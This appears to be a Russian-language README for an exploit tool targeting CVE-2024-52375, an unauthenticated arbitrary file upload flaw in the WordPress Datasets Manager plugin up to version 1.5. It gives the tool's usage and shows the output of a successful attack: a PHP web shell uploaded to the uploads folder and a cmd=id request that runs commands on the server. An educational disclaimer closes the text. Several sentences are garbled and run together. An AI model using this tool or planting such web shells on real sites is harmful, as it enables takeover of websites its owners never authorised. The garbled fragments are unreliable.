
Плагин WordPress Datasets Manager от Arttia Creative <= 1.5 - Уязвимость произвольной загрузки файлов
💥 Эксплойт от: Nxploit (Khaled Alenazi)
📅 CVE опубликован: 14 ноября 2024
🧠 Оценка CVSS: 10.0 (Критический)
🛠 CWE-434: Неограниченная загрузка файла с опасным типом
Критическая уязвимость была обнаружена в плагине WordPress Datasets Manager от Arttia Creative, затрагивающая все версии до 1.5 включительно.
Плагин не выполняет правильную проверку типов файлов в процессе загрузки, что позволяет неаутентифицированному злоумышленнику загружать произвольные файлы — в том числе PHP-шеллы — и добиться удаленного выполнения кода (RCE).
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:Hrequests:
pip install requests
usage: CVE-2024-52375.py [-h] -u URL
Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Full target URL (e.g. http://target.com/wordpress)
Замените URL на полный путь к целевой установке WordPress.
При успешном выполнении скрипт:
_wpnonce из фронтенда.nxploit.php.[+] Shell available at:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php
Затем вы можете выполнять команды, например:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id
readme.txt.<= 1.5.Этот инструмент предоставляется только для образовательных и авторизованных целей тестирования.
Использование его против систем, которые вам не принадлежат или на тестирование которых у вас нет разрешения, незаконно.